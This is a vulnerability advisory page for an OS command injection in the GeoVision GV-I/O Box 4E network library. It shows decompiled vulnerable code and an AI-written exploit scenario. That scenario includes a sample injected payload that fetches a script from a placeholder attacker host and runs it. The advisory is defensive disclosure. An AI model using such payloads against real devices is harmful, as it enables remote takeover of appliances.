Skip to main content

GeoVision GV-I/O Box EUVDEUVD-2026-38650

| CVE-2026-12486 CRITICAL
OS Command Injection (CWE-78)
2026-06-24 GV GHSA-4rgm-6fq6-4x7q
9.1
CVSS 3.1 · Vendor: GV
Share

Severity by source

Vendor (GV) PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.1 CRITICAL

Network-reachable services (AV:N), trivial sprintf-to-system primitive (AC:L), requires admin auth to invoke the config path (PR:H), command execution escapes service context (S:C) with full CIA impact.

3.1 AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (GV).

CVSS VectorVendor: GV

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

1
Analysis Generated
Jun 24, 2026 - 05:30 vuln.today

DescriptionCVE.org

Multiple OS command injection vulnerabilities exist in the libNetSetObj.so functionality of GeoVision GV-I/O Box 4E 2.09. A specially crafted network packet can lead to command execution. An attacker can send a network request to trigger this vulnerability.

libNetSetObj.so is an internal library used by various binaries on the device to configure the network stack (start and stop various services, configure IP, Netmask, gateway, dns, etc.)

CNetSetObj::m_F_n_Set_IP_Addr command injection

The following function takes a string as an ip address, performs no sanitization and calls system. This is a classic command injection vulnerability. The function is reachable from both the network-exposed DVRSearch service and the Network.cgi endpoint.

int __fastcall CNetSetObj::m_F_n_Set_IP_Addr(const char **this, char *ip_addr)

{

bool v2; // zf

char v4[72]; // [sp+0h] [bp-48h] BYREF

v2 = *this == 0;

if ( *this )

v2 = ip_addr == 0;

if ( v2 )

return 0;

sprintf(v4, "/sbin/ifconfig %s %s", *this, ip_addr); // attacker controlled ip address

system(v4);

return 1;

}

AnalysisAI

OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows remote attackers with high privileges to execute arbitrary shell commands by sending crafted network packets to the libNetSetObj.so library via the DVRSearch service or Network.cgi endpoint. The flaw stems from unsanitized attacker-controlled IP address input passed directly to system() in CNetSetObj::m_F_n_Set_IP_Addr. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach device on management network
Delivery
Authenticate as administrator
Exploit
Send crafted IP parameter to Network.cgi or DVRSearch
Execution
libNetSetObj.so sprintf injects shell metacharacters
Persist
system() executes attacker commands
Impact
Persist or pivot from compromised appliance

Vulnerability AssessmentAI

Exploitation Exploitation requires network reachability to either the DVRSearch service or the Network.cgi web endpoint on a GeoVision GV-I/O Box 4E running firmware 2.09, and CVSS PR:H indicates the attacker must already hold high-privilege authentication to the device (typically administrator credentials for the configuration interface). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 score of 9.1 (Critical) reflects network vector (AV:N), low complexity (AC:L), no user interaction (UI:N), high impact across CIA, and scope change (S:C) due to command execution under the device's service context, but it explicitly requires high privileges (PR:H) - meaning the attacker must already hold authenticated access. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has obtained or guessed administrative credentials (or who reaches the device on a flat network where credentials are weak or default) sends an HTTP request to Network.cgi or a crafted DVRSearch packet supplying an IP address parameter containing shell metacharacters such as `; wget http://attacker/x | sh`. The sprintf into the ifconfig command string causes system() to execute the injected command under the service's privilege context, yielding remote code execution on the appliance. …
Remediation No vendor-released patch identified at time of analysis from the provided data; defenders should monitor https://www.geovision.com.tw/cyber_security.php for a firmware update addressing CVE-2026-12486 and apply the fixed firmware to all GV-I/O Box 4E units as soon as it is published. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Immediately identify and isolate all GeoVision GV-I/O Box 4E devices running firmware 2.09 to restricted network segments with access controls limiting connections to essential administrative hosts only. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-38650 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy